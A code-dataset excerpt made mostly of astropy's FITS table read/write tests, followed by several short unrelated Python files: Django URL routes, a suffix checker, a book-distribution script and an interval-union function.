mask_invalid=False)\n assert tab.mask is None\n\n # using memmap also deactivate the masking\n tab = Table.read(filename, memmap=True)\n assert tab.mask is None\n\n def test_mask_null_on_read(self, tmp_path):\n filename = tmp_path / \"test_null_format_parse_on_read.fits\"\n col = fits.Column(\n name=\"a\",\n array=np.array([1, 2, 99, 60000], dtype=\"u2\"),\n format=\"I\",\n null=99,\n bzero=32768,\n )\n bin_table_hdu = fits.BinTableHDU.from_columns([col])\n bin_table_hdu.writeto(filename, overwrite=True)\n\n tab = Table.read(filename)\n assert any(tab.mask)\n assert tab.mask[2]\n\n def test_mask_str_on_read(self, tmp_path):\n filename = tmp_path / \"test_null_format_parse_on_read.fits\"\n col = fits.Column(\n name=\"a\", array=np.array([b\"foo\", b\"bar\", b\"\"], dtype=\"|S3\"), format=\"A3\"\n )\n bin_table_hdu = fits.BinTableHDU.from_columns([col])\n bin_table_hdu.writeto(filename, overwrite=True)\n\n tab = Table.read(filename)\n assert any(tab.mask)\n assert tab.mask[2]\n\n tab = Table.read(filename, mask_invalid=False)\n assert tab.mask is None\n\n def test_heterogeneous_VLA_tables(self, tmp_path):\n \"\"\"\n Check the behaviour of heterogeneous VLA object.\n \"\"\"\n filename = tmp_path / \"test_table_object.fits\"\n msg = \"Column 'col1' contains unsupported object types or mixed types: \"\n\n # The column format fix the type of the arrays in the VLF object.\n a = np.array([45, 30])\n b = np.array([11.0, 12.0, 13])\n var = np.array([a, b], dtype=object)\n tab = Table({\"col1\": var})\n with pytest.raises(TypeError, match=msg):\n tab.write(filename)\n\n # Strings in the VLF object can't be added to the table\n a = np.array([\"five\", \"thirty\"])\n b = np.array([11.0, 12.0, 13])\n var = np.array([a, b], dtype=object)\n with pytest.raises(TypeError, match=msg):\n tab.write(filename)\n\n def test_write_object_tables_with_unified(self, tmp_path):\n \"\"\"\n Write objects with the unified I/O interface.\n See https://github.com/astropy/astropy/issues/1906\n \"\"\"\n filename = tmp_path / \"test_table_object.fits\"\n msg = r\"Column 'col1' contains unsupported object types or mixed types: {dtype\\('O'\\)}\"\n # Make a FITS table with an object column\n tab = Table({\"col1\": [None]})\n with pytest.raises(TypeError, match=msg):\n tab.write(filename)\n\n def test_write_VLA_tables_with_unified(self, tmp_path):\n \"\"\"\n Write VLA objects with the unified I/O interface.\n See https://github.com/astropy/astropy/issues/11323\n \"\"\"\n\n filename = tmp_path / \"test_table_VLA.fits\"\n # Make a FITS table with a variable-length array column\n a = np.array([45, 30])\n b = np.array([11, 12, 13])\n c = np.array([45, 55, 65, 75])\n var = np.array([a, b, c], dtype=object)\n\n tabw = Table({\"col1\": var})\n tabw.write(filename)\n\n tab = Table.read(filename)\n assert np.array_equal(tab[0][\"col1\"], np.array([45, 30]))\n assert np.array_equal(tab[1][\"col1\"], np.array([11, 12, 13]))\n assert np.array_equal(tab[2][\"col1\"], np.array([45, 55, 65, 75]))\n\n\nclass TestMultipleHDU:\n def setup_class(self):\n self.data1 = np.array(\n list(zip([1, 2, 3, 4], [\"a\", \"b\", \"c\", \"d\"], [2.3, 4.5, 6.7, 8.9])),\n dtype=[(\"a\", int), (\"b\", \"U1\"), (\"c\", float)],\n )\n self.data2 = np.array(\n list(zip([1.4, 2.3, 3.2, 4.7], [2.3, 4.5, 6.7, 8.9])),\n dtype=[(\"p\", float), (\"q\", float)],\n )\n self.data3 = np.array(\n list(zip([1, 2, 3, 4], [2.3, 4.5, 6.7, 8.9])),\n dtype=[(\"A\", int), (\"B\", float)],\n )\n hdu0 = PrimaryHDU()\n hdu1 = BinTableHDU(self.data1, name=\"first\")\n hdu2 = BinTableHDU(self.data2, name=\"second\")\n hdu3 = ImageHDU(np.ones((3, 3)), name=\"third\")\n hdu4 = BinTableHDU(self.data3)\n\n self.hdus = HDUList([hdu0, hdu1, hdu2, hdu3, hdu4])\n self.hdusb = HDUList([hdu0, hdu3, hdu2, hdu1])\n self.hdus3 = HDUList([hdu0, hdu3, hdu2])\n self.hdus2 = HDUList([hdu0, hdu1, hdu3])\n self.hdus1 = HDUList([hdu0, hdu1])\n\n def teardown_class(self):\n del self.hdus\n\n def setup_method(self, method):\n warnings.filterwarnings(\"always\")\n\n def test_read(self, tmp_path):\n filename = tmp_path / \"test_read.fits\"\n self.hdus.writeto(filename)\n with pytest.warns(\n AstropyUserWarning,\n match=r\"hdu= was not specified but multiple tables \"\n r\"are present, reading in first available \"\n r\"table \\(hdu=1\\)\",\n ):\n t = Table.read(filename)\n assert equal_data(t, self.data1)\n\n filename = tmp_path / \"test_read_2.fits\"\n self.hdusb.writeto(filename)\n with pytest.warns(\n AstropyUserWarning,\n match=r\"hdu= was not specified but multiple tables \"\n r\"are present, reading in first available \"\n r\"table \\(hdu=2\\)\",\n ):\n t3 = Table.read(filename)\n assert equal_data(t3, self.data2)\n\n def test_read_with_hdu_0(self, tmp_path):\n filename = tmp_path / \"test_read_with_hdu_0.fits\"\n self.hdus.writeto(filename)\n with pytest.raises(ValueError) as exc:\n Table.read(filename, hdu=0)\n assert exc.value.args[0] == \"No table found in hdu=0\"\n\n @pytest.mark.parametrize(\"hdu\", [1, \"first\"])\n def test_read_with_hdu_1(self, tmp_path, hdu):\n filename = tmp_path / \"test_read_with_hdu_1.fits\"\n self.hdus.writeto(filename)\n t = Table.read(filename, hdu=hdu)\n assert equal_data(t, self.data1)\n\n @pytest.mark.parametrize(\"hdu\", [2, \"second\"])\n def test_read_with_hdu_2(self, tmp_path, hdu):\n filename = tmp_path / \"test_read_with_hdu_2.fits\"\n self.hdus.writeto(filename)\n t = Table.read(filename, hdu=hdu)\n assert equal_data(t, self.data2)\n\n @pytest.mark.parametrize(\"hdu\", [3, \"third\"])\n def test_read_with_hdu_3(self, tmp_path, hdu):\n filename = tmp_path / \"test_read_with_hdu_3.fits\"\n self.hdus.writeto(filename)\n with pytest.raises(ValueError, match=\"No table found in hdu=3\"):\n Table.read(filename, hdu=hdu)\n\n def test_read_with_hdu_4(self, tmp_path):\n filename = tmp_path / \"test_read_with_hdu_4.fits\"\n self.hdus.writeto(filename)\n t = Table.read(filename, hdu=4)\n assert equal_data(t, self.data3)\n\n @pytest.mark.parametrize(\"hdu\", [2, 3, \"1\", \"second\", \"\"])\n def test_read_with_hdu_missing(self, tmp_path, hdu):\n filename = tmp_path / \"test_warn_with_hdu_1.fits\"\n self.hdus1.writeto(filename)\n with pytest.warns(\n AstropyDeprecationWarning,\n match=rf\"Specified hdu={hdu} not found, \"\n r\"reading in first available table \\(hdu=1\\)\",\n ):\n t1 = Table.read(filename, hdu=hdu)\n assert equal_data(t1, self.data1)\n\n @pytest.mark.parametrize(\"hdu\", [0, 2, \"third\"])\n def test_read_with_hdu_warning(self, tmp_path, hdu):\n filename = tmp_path / \"test_warn_with_hdu_2.fits\"\n self.hdus2.writeto(filename)\n with pytest.warns(\n AstropyDeprecationWarning,\n match=rf\"No table found in specified hdu={hdu}, \"\n r\"reading in first available table \\(hdu=1\\)\",\n ):\n t2 = Table.read(filename, hdu=hdu)\n assert equal_data(t2, self.data1)\n\n @pytest.mark.parametrize(\"hdu\", [0, 1, \"third\"])\n def test_read_in_last_hdu(self, tmp_path, hdu):\n filename = tmp_path / \"test_warn_with_hdu_3.fits\"\n self.hdus3.writeto(filename)\n with pytest.warns(\n AstropyDeprecationWarning,\n match=rf\"No table found in specified hdu={hdu}, \"\n r\"reading in first available table \\(hdu=2\\)\",\n ):\n t3 = Table.read(filename, hdu=hdu)\n assert equal_data(t3, self.data2)\n\n def test_read_from_hdulist(self):\n with pytest.warns(\n AstropyUserWarning,\n match=r\"hdu= was not specified but multiple tables \"\n r\"are present, reading in first available \"\n r\"table \\(hdu=1\\)\",\n ):\n t = Table.read(self.hdus)\n assert equal_data(t, self.data1)\n\n with pytest.warns(\n AstropyUserWarning,\n match=r\"hdu= was not specified but multiple tables \"\n r\"are present, reading in first available \"\n r\"table \\(hdu=2\\)\",\n ):\n t3 = Table.read(self.hdusb)\n assert equal_data(t3, self.data2)\n\n def test_read_from_hdulist_with_hdu_0(self):\n with pytest.raises(ValueError) as exc:\n Table.read(self.hdus, hdu=0)\n assert exc.value.args[0] == \"No table found in hdu=0\"\n\n @pytest.mark.parametrize(\"hdu\", [1, \"first\", None])\n def test_read_from_hdulist_with_single_table(self, hdu):\n t = Table.read(self.hdus1, hdu=hdu)\n assert equal_data(t, self.data1)\n\n @pytest.mark.parametrize(\"hdu\", [1, \"first\"])\n def test_read_from_hdulist_with_hdu_1(self, hdu):\n t = Table.read(self.hdus, hdu=hdu)\n assert equal_data(t, self.data1)\n\n @pytest.mark.parametrize(\"hdu\", [2, \"second\"])\n def test_read_from_hdulist_with_hdu_2(self, hdu):\n t = Table.read(self.hdus, hdu=hdu)\n assert equal_data(t, self.data2)\n\n @pytest.mark.parametrize(\"hdu\", [3, \"third\"])\n def test_read_from_hdulist_with_hdu_3(self, hdu):\n with pytest.raises(ValueError, match=\"No table found in hdu=3\"):\n Table.read(self.hdus, hdu=hdu)\n\n @pytest.mark.parametrize(\"hdu\", [0, 2, \"third\"])\n def test_read_from_hdulist_with_hdu_warning(self, hdu):\n with pytest.warns(\n AstropyDeprecationWarning,\n match=rf\"No table found in specified hdu={hdu}, \"\n r\"reading in first available table \\(hdu=1\\)\",\n ):\n t2 = Table.read(self.hdus2, hdu=hdu)\n assert equal_data(t2, self.data1)\n\n @pytest.mark.parametrize(\"hdu\", [2, 3, \"1\", \"second\", \"\"])\n def test_read_from_hdulist_with_hdu_missing(self, hdu):\n with pytest.warns(\n AstropyDeprecationWarning,\n match=rf\"Specified hdu={hdu} not found, \"\n r\"reading in first available table \\(hdu=1\\)\",\n ):\n t1 = Table.read(self.hdus1, hdu=hdu)\n assert equal_data(t1, self.data1)\n\n @pytest.mark.parametrize(\"hdu\", [0, 1, \"third\"])\n def test_read_from_hdulist_in_last_hdu(self, hdu):\n with pytest.warns(\n AstropyDeprecationWarning,\n match=rf\"No table found in specified hdu={hdu}, \"\n r\"reading in first available table \\(hdu=2\\)\",\n ):\n t3 = Table.read(self.hdus3, hdu=hdu)\n assert equal_data(t3, self.data2)\n\n @pytest.mark.parametrize(\"hdu\", [None, 1, \"first\"])\n def test_read_from_single_hdu(self, hdu):\n t = Table.read(self.hdus[1])\n assert equal_data(t, self.data1)\n\n\ndef test_masking_regression_1795():\n \"\"\"\n Regression test for #1795 - this bug originally caused columns where TNULL\n was not defined to have their first element masked.\n \"\"\"\n t = Table.read(get_pkg_data_filename(\"data/tb.fits\"))\n assert np.all(t[\"c1\"].mask == np.array([False, False]))\n assert not hasattr(t[\"c2\"], \"mask\")\n assert not hasattr(t[\"c3\"], \"mask\")\n assert not hasattr(t[\"c4\"], \"mask\")\n assert np.all(t[\"c1\"].data == np.array([1, 2]))\n assert np.all(t[\"c2\"].data == np.array([b\"abc\", b\"xy \"]))\n assert_allclose(t[\"c3\"].data, np.array([3.70000007153, 6.6999997139]))\n assert np.all(t[\"c4\"].data == np.array([False, True]))\n\n\ndef test_scale_error():\n a = [1, 4, 5]\n b = [2.0, 5.0, 8.2]\n c = [\"x\", \"y\", \"z\"]\n t = Table([a, b, c], names=(\"a\", \"b\", \"c\"), meta={\"name\": \"first table\"})\n t[\"a\"].unit = \"1.2\"\n with pytest.raises(\n UnitScaleError,\n match=r\"The column 'a' could not be \"\n r\"stored in FITS format because it has a scale '\\(1\\.2\\)'\"\n r\" that is not recognized by the FITS standard\\. Either \"\n r\"scale the data or change the units\\.\",\n ):\n t.write(\"t.fits\", format=\"fits\", overwrite=True)\n\n\n@pytest.mark.parametrize(\n \"tdisp_str, format_return\",\n [\n (\"EN10.5\", (\"EN\", \"10\", \"5\", None)),\n (\"F6.2\", (\"F\", \"6\", \"2\", None)),\n (\"B5.10\", (\"B\", \"5\", \"10\", None)),\n (\"E10.5E3\", (\"E\", \"10\", \"5\", \"3\")),\n (\"A21\", (\"A\", \"21\", None, None)),\n ],\n)\ndef test_parse_tdisp_format(tdisp_str, format_return):\n assert _parse_tdisp_format(tdisp_str) == format_return\n\n\n@pytest.mark.parametrize(\n \"tdisp_str, format_str_return\",\n [\n (\"G15.4E2\", \"{:15.4g}\"),\n (\"Z5.10\", \"{:5x}\"),\n (\"I6.5\", \"{:6d}\"),\n (\"L8\", \"{:>8}\"),\n (\"E20.7\", \"{:20.7e}\"),\n ],\n)\ndef test_fortran_to_python_format(tdisp_str, format_str_return):\n assert _fortran_to_python_format(tdisp_str) == format_str_return\n\n\n@pytest.mark.parametrize(\n \"fmt_str, tdisp_str\",\n [\n (\"{:3d}\", \"I3\"),\n (\"3d\", \"I3\"),\n (\"7.3f\", \"F7.3\"),\n (\"{:>4}\", \"A4\"),\n (\"{:7.4f}\", \"F7.4\"),\n (\"%5.3g\", \"G5.3\"),\n (\"%10s\", \"A10\"),\n (\"%.4f\", \"F13.4\"),\n ],\n)\ndef test_python_to_tdisp(fmt_str, tdisp_str):\n assert python_to_tdisp(fmt_str) == tdisp_str\n\n\ndef test_logical_python_to_tdisp():\n assert python_to_tdisp(\"{:>7}\", logical_dtype=True) == \"L7\"\n\n\ndef test_bool_column(tmp_path):\n \"\"\"\n Regression test for https://github.com/astropy/astropy/issues/1953\n\n Ensures that Table columns of bools are properly written to a FITS table.\n \"\"\"\n\n arr = np.ones(5, dtype=bool)\n arr[::2] = False\n\n t = Table([arr])\n t.write(tmp_path / \"test.fits\", overwrite=True)\n\n with fits.open(tmp_path / \"test.fits\") as hdul:\n assert hdul[1].data[\"col0\"].dtype == np.dtype(\"bool\")\n assert np.all(hdul[1].data[\"col0\"] == arr)\n\n\ndef test_unicode_column(tmp_path):\n \"\"\"\n Test that a column of unicode strings is still written as one\n byte-per-character in the FITS table (so long as the column can be ASCII\n encoded).\n\n Regression test for one of the issues fixed in\n https://github.com/astropy/astropy/pull/4228\n \"\"\"\n\n t = Table([np.array([\"a\", \"b\", \"cd\"])])\n t.write(tmp_path / \"test.fits\", overwrite=True)\n\n with fits.open(tmp_path / \"test.fits\") as hdul:\n assert np.all(hdul[1].data[\"col0\"] == [\"a\", \"b\", \"cd\"])\n assert hdul[1].header[\"TFORM1\"] == \"2A\"\n\n t2 = Table([np.array([\"\\N{SNOWMAN}\"])])\n\n with pytest.raises(UnicodeEncodeError):\n t2.write(tmp_path / \"test.fits\", overwrite=True)\n\n\ndef test_unit_warnings_read_write(tmp_path):\n filename = tmp_path / \"test_unit.fits\"\n t1 = Table([[1, 2], [3, 4]], names=[\"a\", \"b\"])\n t1[\"a\"].unit = \"m/s\"\n t1[\"b\"].unit = \"not-a-unit\"\n\n with pytest.warns(\n u.UnitsWarning, match=\"'not-a-unit' did not parse as fits unit\"\n ) as w:\n t1.write(filename, overwrite=True)\n assert len(w) == 1\n\n with pytest.warns(\n u.UnitsWarning, match=\"'not-a-unit' did not parse as fits unit\"\n ) as w:\n Table.read(filename, hdu=1)\n\n\ndef test_convert_comment_convention():\n \"\"\"\n Regression test for https://github.com/astropy/astropy/issues/6079\n \"\"\"\n filename = get_pkg_data_filename(\"data/stddata.fits\")\n with pytest.warns(\n AstropyUserWarning,\n match=r\"hdu= was not specified but multiple tables are present\",\n ):\n t = Table.read(filename)\n\n assert t.meta[\"comments\"] == [\n \"\",\n \" *** End of mandatory fields ***\",\n \"\",\n \"\",\n \" *** Column names ***\",\n \"\",\n \"\",\n \" *** Column formats ***\",\n \"\",\n ]\n\n\ndef assert_objects_equal(obj1, obj2, attrs, compare_class=True):\n if compare_class:\n assert obj1.__class__ is obj2.__class__\n\n info_attrs = [\n \"info.name\",\n \"info.format\",\n \"info.unit\",\n \"info.description\",\n \"info.meta\",\n \"info.dtype\",\n ]\n for attr in attrs + info_attrs:\n a1 = obj1\n a2 = obj2\n for subattr in attr.split(\".\"):\n try:\n a1 = getattr(a1, subattr)\n a2 = getattr(a2, subattr)\n except AttributeError:\n a1 = a1[subattr]\n a2 = a2[subattr]\n\n # Mixin info.meta can None instead of empty OrderedDict(), #6720 would\n # fix this.\n if attr == \"info.meta\":\n if a1 is None:\n a1 = {}\n if a2 is None:\n a2 = {}\n\n if isinstance(a1, np.ndarray) and a1.dtype.kind == \"f\":\n assert quantity_allclose(a1, a2, rtol=1e-15)\n elif isinstance(a1, np.dtype):\n # FITS does not perfectly preserve dtype: byte order can change, and\n # unicode gets stored as bytes. So, we just check safe casting, to\n # ensure we do not, e.g., accidentally change integer to float, etc.\n assert np.can_cast(a2, a1, casting=\"safe\")\n else:\n assert np.all(a1 == a2)\n\n\ndef test_fits_mixins_qtable_to_table(tmp_path):\n \"\"\"Test writing as QTable and reading as Table. Ensure correct classes\n come out.\n \"\"\"\n filename = tmp_path / \"test_simple.fits\"\n\n names = sorted(mixin_cols)\n\n t = QTable([mixin_cols[name] for name in names], names=names)\n t.write(filename, format=\"fits\")\n t2 = Table.read(filename, format=\"fits\", astropy_native=True)\n\n assert t.colnames == t2.colnames\n\n for name, col in t.columns.items():\n col2 = t2[name]\n\n # Special-case Time, which does not yet support round-tripping\n # the format.\n if isinstance(col2, Time):\n col2.format = col.format\n\n attrs = compare_attrs[name]\n compare_class = True\n\n if isinstance(col.info, QuantityInfo):\n # Downgrade Quantity to Column + unit\n assert type(col2) is Column\n # Class-specific attributes like `value` or `wrap_angle` are lost.\n attrs = [\"unit\"]\n compare_class = False\n # Compare data values here (assert_objects_equal doesn't know how in this case)\n assert np.all(col.value == col2)\n\n assert_objects_equal(col, col2, attrs, compare_class)\n\n\n@pytest.mark.parametrize(\"table_cls\", (Table, QTable))\ndef test_fits_mixins_as_one(table_cls, tmp_path):\n \"\"\"Test write/read all cols at once and validate intermediate column names\"\"\"\n filename = tmp_path / \"test_simple.fits\"\n names = sorted(mixin_cols)\n # FITS stores times directly, so we just get the column back.\n all_serialized_names = []\n for name in sorted(mixin_cols):\n all_serialized_names.extend(\n [name] if isinstance(mixin_cols[name], Time) else serialized_names[name]\n )\n t = table_cls([mixin_cols[name] for name in names], names=names)\n t.meta[\"C\"] = \"spam\"\n t.meta[\"comments\"] = [\"this\", \"is\", \"a\", \"comment\"]\n t.meta[\"history\"] = [\"first\", \"second\", \"third\"]\n\n t.write(filename, format=\"fits\")\n\n t2 = table_cls.read(filename, format=\"fits\", astropy_native=True)\n assert t2.meta[\"C\"] == \"spam\"\n assert t2.meta[\"comments\"] == [\"this\", \"is\", \"a\", \"comment\"]\n assert t2.meta[\"HISTORY\"] == [\"first\", \"second\", \"third\"]\n\n assert t.colnames == t2.colnames\n\n # Read directly via fits and confirm column names\n with fits.open(filename) as hdus:\n assert hdus[1].columns.names == all_serialized_names\n\n\n@pytest.mark.parametrize(\"name_col\", list(mixin_cols.items()))\n@pytest.mark.parametrize(\"table_cls\", (Table, QTable))\ndef test_fits_mixins_per_column(table_cls, name_col, tmp_path):\n \"\"\"Test write/read one col at a time and do detailed validation\"\"\"\n filename = tmp_path / \"test_simple.fits\"\n name, col = name_col\n\n c = [1.0, 2.0]\n t = table_cls([c, col, c], names=[\"c1\", name, \"c2\"])\n t[name].info.description = \"my \\n\\n\\n description\"\n t[name].info.meta = {\"list\": list(range(50)), \"dict\": {\"a\": \"b\" * 200}}\n\n if not t.has_mixin_columns:\n pytest.skip(\"column is not a mixin (e.g. Quantity subclass in Table)\")\n\n t.write(filename, format=\"fits\")\n t2 = table_cls.read(filename, format=\"fits\", astropy_native=True)\n if isinstance(col, Time):\n # FITS Time does not preserve format\n t2[name].format = col.format\n\n assert t.colnames == t2.colnames\n\n for colname in t.colnames:\n compare = [\"data\"] if colname in (\"c1\", \"c2\") else compare_attrs[colname]\n assert_objects_equal(t[colname], t2[colname], compare)\n\n # Special case to make sure Column type doesn't leak into Time class data\n if name.startswith(\"tm\"):\n assert t2[name]._time.jd1.__class__ is np.ndarray\n assert t2[name]._time.jd2.__class__ is np.ndarray\n\n\n@pytest.mark.parametrize(\"name_col\", unsupported_cols.items())\n@pytest.mark.xfail(reason=\"column type unsupported\")\ndef test_fits_unsupported_mixin(self, name_col, tmp_path):\n # Check that we actually fail in writing unsupported columns defined\n # on top.\n filename = tmp_path / \"test_simple.fits\"\n name, col = name_col\n Table([col], names=[name]).write(filename, format=\"fits\")\n\n\ndef test_info_attributes_with_no_mixins(tmp_path):\n \"\"\"Even if there are no mixin columns, if there is metadata that would be lost it still\n gets serialized\n \"\"\"\n filename = tmp_path / \"test.fits\"\n t = Table([[1.0, 2.0]])\n t[\"col0\"].description = \"hello\" * 40\n t[\"col0\"].format = \"{:8.4f}\"\n t[\"col0\"].meta[\"a\"] = {\"b\": \"c\"}\n t.write(filename, overwrite=True)\n\n t2 = Table.read(filename)\n assert t2[\"col0\"].description == \"hello\" * 40\n assert t2[\"col0\"].format == \"{:8.4f}\"\n assert t2[\"col0\"].meta[\"a\"] == {\"b\": \"c\"}\n\n\n@pytest.mark.parametrize(\"method\", [\"set_cols\", \"names\", \"class\"])\ndef test_round_trip_masked_table_serialize_mask(tmp_path, method):\n \"\"\"\n Same as previous test but set the serialize_method to 'data_mask' so mask is\n written out and the behavior is all correct.\n \"\"\"\n filename = tmp_path / \"test.fits\"\n\n t = simple_table(masked=True) # int, float, and str cols with one masked element\n\n # MaskedColumn but no masked elements. See table the MaskedColumnInfo class\n # _represent_as_dict() method for info about we test a column with no masked elements.\n t[\"d\"] = [1, 2, 3]\n\n if method == \"set_cols\":\n for col in t.itercols():\n col.info.serialize_method[\"fits\"] = \"data_mask\"\n t.write(filename)\n elif method == \"names\":\n t.write(\n filename,\n serialize_method={\n \"a\": \"data_mask\",\n \"b\": \"data_mask\",\n \"c\": \"data_mask\",\n \"d\": \"data_mask\",\n },\n )\n elif method == \"class\":\n t.write(filename, serialize_method=\"data_mask\")\n\n t2 = Table.read(filename)\n assert t2.masked is False\n assert t2.colnames == t.colnames\n for name in t2.colnames:\n assert np.all(t2[name].mask == t[name].mask)\n assert np.all(t2[name] == t[name])\n\n # Data under the mask round-trips also (unmask data to show this).\n t[name].mask = False\n t2[name].mask = False\n assert np.all(t2[name] == t[name])\n\n\ndef test_meta_not_modified(tmp_path):\n filename = tmp_path / \"test.fits\"\n t = Table(data=[Column([1, 2], \"a\", description=\"spam\")])\n t.meta[\"comments\"] = [\"a\", \"b\"]\n assert len(t.meta) == 1\n t.write(filename)\n assert len(t.meta) == 1\n assert t.meta[\"comments\"] == [\"a\", \"b\"]\n\n\ndef test_is_fits_gh_14305():\n \"\"\"Regression test for https://github.com/astropy/astropy/issues/14305\"\"\"\n assert not connect.is_fits(\"\", \"foo.bar\", None)\n\n\ndef test_keep_masked_state_integer_columns(tmp_path):\n \"\"\"Regression test for https://github.com/astropy/astropy/issues/15417\"\"\"\n filename = tmp_path / \"test_masked.fits\"\n t = Table([[1, 2], [1.5, 2.5]], names=[\"a\", \"b\"])\n t[\"c\"] = MaskedColumn([1, 2], mask=[True, False])\n t.write(filename)\n tr = Table.read(filename)\n assert not isinstance(tr[\"a\"], MaskedColumn)\n assert not isinstance(tr[\"b\"], MaskedColumn)\n assert isinstance(tr[\"c\"], MaskedColumn)\n\n\ndef test_null_propagation_in_table_read(tmp_path):\n \"\"\"Checks that integer columns with a TNULL value set (e.g. masked columns)\n have their TNULL value propagated when being read in by Table.read\"\"\"\n\n # Could be anything except for 999999, which is the \"default\" fill_value\n # for masked int arrays\n NULL_VALUE = -1\n\n output_filename = tmp_path / \"null_table.fits\"\n\n data = np.asarray([1, 2, NULL_VALUE, 4], dtype=np.int32)\n\n # Create table with BinTableHDU, with integer column containing a custom null\n c = fits.Column(name=\"a\", array=data, null=NULL_VALUE, format=\"J\")\n hdu = BinTableHDU.from_columns([c])\n hdu.writeto(output_filename)\n\n # Read the table in with Table.read, and ensure the column's fill_value is\n # equal to NULL_VALUE\n t = Table.read(output_filename)\n assert t[\"a\"].fill_value == NULL_VALUE\n","repo_name":"astropy/astropy","sub_path":"astropy/io/fits/tests/test_connect.py","file_name":"test_connect.py","file_ext":"py","file_size_in_byte":39891,"program_lang":"python","lang":"en","doc_type":"code","stars":4015,"dataset":"github-code","pt":"21"} +{"seq_id":"23424364293","text":"from django.conf.urls import url\nfrom testing import views\n\nurlpatterns=[\nurl(r'^register/$', views.register, name='register'),\nurl(r'^first/$', views.first),\nurl(r'^login/$', views.user_login, name='login'),\nurl(r'^logout/$', views.user_logout, name='logout'),\nurl(r'^owncourse/$',views.list,name=\"list\"),\nurl(r'^owncourse/(?P<pk>[0-9]+)/delete/$',views.coursedeleteview.as_view()),\nurl(r'^owncourse/(?P<pk>[0-9]+)/update/$',views.courseupdateview.as_view()),\nurl(r'^owncourse/(?P<pk>[0-9]+)/posts/$',views.postlist,name='posts'),\nurl(r'^owncourse/(?P<id>[0-9]+)/posts/(?P<pk>[0-9]+)/delete/$',views.postdeleteview.as_view()),\nurl(r'^owncourse/(?P<id>[0-9]+)/posts/(?P<pk>[0-9]+)/update/$',views.postupdateview.as_view()),\n#url(r'^addcourse/$',views.coursecreateview.as_view()),\n#url(r'^addposts/(?P<pk>[0-9]+)/$',views.postcreateview.as_view()),\n url(r'^join/$',views.allcourses,name=\"all\"),\nurl(r'^enroll/(?P<pk>[0-9]+)/$',views.enroll),\nurl(r'^unenroll/(?P<pk>[0-9]+)/$',views.unenroll),\nurl(r'^posts/(?P<pk>[0-9]+)/$',views.postdetail),\n ]\n","repo_name":"shilpathakur95/knowledgejar","sub_path":"testing/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3139585475","text":"# A = (a, b)\n# L5 = todas as palavras possuem bab como sufixo\ndesc = 'todas as palavras possuem bab como sufixo'\n\nimport funcutils\n\nAteste = ['a', 'b']\nwteste = 'abababbabab'\n\ndef main(w, A):\n\ttry:\n\t\tfuncutils.analizAlfb(w, A)\n\t\t\n\t\tif w[len(w)-3:] != 'bab':\n\t\t\traise Exception('w inválida: palavra não termina com bab')\n\t\telse:\n\t\t\treturn [True, 0]\n\texcept Exception as e:\n\t\treturn [False, e]\n\t\n\t\nif __name__=='__main__':\n\tmain(wteste, Ateste)\n","repo_name":"felipegarcia99/reconhecimento-linguagens-formais","sub_path":"l5.py","file_name":"l5.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6063190541","text":"import csv\nimport json\n\nbooks_file = 'books.csv'\nusers_file = 'users.json'\nresult_file = 'result.json'\n\n\ndef get_books():\n try:\n with open(books_file, \"r\", encoding=\"utf-8\") as f:\n books_raw = csv.DictReader(f)\n books = [dict(filter(lambda key: key[0] != \"Publisher\", row.items())) for row in books_raw]\n return books\n except (Exception, IOError) as e:\n print(e)\n\n\ndef get_users():\n try:\n with open(users_file, \"r\", encoding=\"utf-8\") as f:\n users_raw = json.loads(f.read())\n keys = (\"name\", \"gender\", \"address\", \"age\")\n # users = [dict(filter(lambda key: key[0] in keys, row.items())) for row in users_raw]\n # list(map(lambda d: d.update({\"books\": []}), users))\n users = []\n for user_data in users_raw:\n user = {key: val for key, val in user_data.items() if key in keys}\n users.append(\n user | {'books': []}\n )\n return users\n except (Exception, IOError) as e:\n print(e)\n\n\ndef distribute_books(users, books):\n if isinstance(users, list) and isinstance(books, list):\n i = 0\n while i < len(books):\n for user in users:\n user[\"books\"].append(books[i])\n i += 1\n if i == len(books):\n break\n return users\n\n\ndef write_result(result):\n if isinstance(result, list):\n try:\n with open(result_file, \"w\", encoding=\"utf-8\") as f:\n f.write(json.dumps(result, indent=4, ensure_ascii=False))\n print(f'Файл {result_file} создан')\n except (Exception, IOError) as e:\n print(e)\n else:\n print(f'Файл {result_file} не создан')\n\n\ndef main():\n r = distribute_books(get_users(), get_books())\n write_result(r)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"nevlaxgmailcom/python_otus_learning","sub_path":"hw3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12561913127","text":"from enum import Enum\nfrom collections import namedtuple\n\nclass State(Enum):\n open = 1\n closed = 2\n\nPoint = namedtuple('Point', ['val', 'state'])\n\nclass Interval(object):\n\n def __init__(self, p1, p2):\n self.p1, self.p2 = sorted([p1, p2], key = lambda p: p.val)\n\n def __repr__(self):\n left_b = '[ ' if self.p1.state == State.closed else '( '\n right_b = ' ]' if self.p2.state == State.closed else ' )'\n return left_b + str(self.p1.val) + ', ' + str(self.p2.val) + right_b\n\n def __eq__(self, other):\n return all([\n self.p1.val == other.p1.val,\n self.p1.state == other.p1.state,\n self.p2.val == other.p2.val,\n self.p2.state == other.p2.state\n ])\n\n\ndef compute_union(intervals):\n consolidation = []\n if intervals:\n ordered_intrvls = sorted(intervals, key = lambda intrvl: intrvl.p1.val)\n start, end = ordered_intrvls[0].p1, ordered_intrvls[0].p2\n for i in range(1, len(ordered_intrvls)):\n intrvl = ordered_intrvls[i]\n\n if intrvl.p1.val == start.val and intrvl.p1.state == State.closed:\n start = Point(start.val, State.closed)\n\n if intrvl.p1.val <= end.val and intrvl.p2.val >= end.val:\n state = intrvl.p2.state\n if intrvl.p2.val == end.val and end.state == State.closed:\n state = state.closed\n end = Point(intrvl.p2.val, state)\n elif intrvl.p1.val > end.val:\n consolidation.append(Interval(start, end))\n start, end = intrvl.p1, intrvl.p2\n\n consolidation.append(Interval(start, end))\n\n return consolidation\n\n","repo_name":"aburke/dragonstone","sub_path":"epi2/sorting_13_7.py","file_name":"sorting_13_7.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40441570681","text":"class TrieNode:\n def 